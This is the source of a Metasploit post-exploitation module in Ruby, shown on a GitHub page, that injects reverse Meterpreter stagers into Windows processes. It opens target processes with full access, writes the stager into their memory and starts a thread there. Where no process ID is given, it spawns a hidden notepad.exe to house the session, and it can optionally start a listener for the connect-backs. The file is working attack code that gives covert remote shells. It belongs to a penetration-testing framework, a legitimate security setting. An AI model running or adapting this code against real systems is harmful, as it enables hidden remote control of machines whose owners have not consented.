forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathmulti_meterpreter_inject.rb
142 lines (124 loc) · 5.03 KB
/
multi_meterpreter_inject.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
##
# $Id$
##
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Inject in Memory Multiple Payloads',
'Description' => %q{ This module will inject in to several process a given
payload and connecting to a given list of IP Addresses.
The module works with a given lists of IP Addresses and
process PIDs if no PID is given it will start a the given
process in the advanced options and inject the selected
payload in to the memory of the created module.},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter']
))
register_options(
[
OptString.new('PAYLOAD', [false, 'Payload to inject in to process memory', "windows/meterpreter/reverse_tcp"]),
OptInt.new('LPORT', [false, 'Port number for the payload LPORT variable.', 4444]),
OptString.new('IPLIST', [true, 'List of semicolom separated IP list.', Rex::Socket.source_address("1.2.3.4")]),
OptString.new('PIDLIST', [false, 'List of semicolom separated PID list.', '']),
OptBool.new('HANDLER', [false, 'Start new multi/handler job on local box.', false])
], self.class)
register_advanced_options(
[
OptString.new('PROCESSNAME', [false, 'Description', 'notepad.exe'])
],self.class)
end
# Run Method for when run command is issued
def run
unless client.platform =~ /win/
print_error("This module requires native Windows meterpreter functions not compatible with the selected session")
return
end
# Set variables
multi_ip = nil
multi_pid = nil
print_status("Running module against #{sysinfo['Computer']}")
if datastore['HANDLER']
create_multi_handler(datastore['PAYLOAD'],datastore['LPORT'])
end
multi_ip = datastore['IPLIST'].split(";")
multi_pid = datastore['PIDLIST'].split(";")
multi_ip.zip(multi_pid).each do |a|
# Check if we have an IP for the session
if a[1]
payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
inject(a[1],payload)
select(nil, nil, nil, 5)
else
# if no PID we create a process to host the Meterpreter session
payload = create_payload(datastore['PAYLOAD'],a[0],datastore['LPORT'])
pid_num = start_proc(datastore['PROCESSNAME'])
inject(pid_num,payload)
select(nil, nil, nil, 5)
end
end
end
# Function for injecting payload in to a given PID
#-------------------------------------------------------------------------------
def inject(target_pid, payload_to_inject)
print_status("Injecting meterpreter into process ID #{target_pid}")
begin
host_process = session.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
raw = payload_to_inject.generate
mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
print_status("Writing the stager into memory...")
host_process.memory.write(mem, raw)
host_process.thread.create(mem, 0)
print_good("Successfully injected Meterpreter in to process: #{target_pid}")
rescue::Exception => e
print_error("Failed to Inject Payload to #{target_pid}!")
print_error(e)
end
end
# Function for Creation of Connection Handler
#-------------------------------------------------------------------------------
def create_multi_handler(payload_to_inject,rport,rhost = '0.0.0.0')
print_status("Starting connection handler at port #{rport} for #{payload_to_inject}")
mul = client.framework.exploits.create("multi/handler")
mul.datastore['WORKSPACE'] = session.workspace
mul.datastore['PAYLOAD'] = payload_to_inject
mul.datastore['LHOST'] = rhost
mul.datastore['LPORT'] = rport
mul.datastore['EXITFUNC'] = 'process'
mul.datastore['ExitOnSession'] = false
mul.exploit_simple(
'Payload' => mul.datastore['PAYLOAD'],
'RunAsJob' => true
)
print_good("Multi/Handler started!")
end
# Function for Creating the Payload
#-------------------------------------------------------------------------------
def create_payload(payload_type,lhost,lport)
print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
payload = payload_type
pay = client.framework.payloads.create(payload)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
return pay
end
# Function starting notepad.exe process
#-------------------------------------------------------------------------------
def start_proc(proc_name)
print_good("Starting Notepad.exe to house Meterpreter Session.")
proc = client.sys.process.execute(proc_name, nil, {'Hidden' => true })
print_good("Process created with pid #{proc.pid}")
return proc.pid
end
end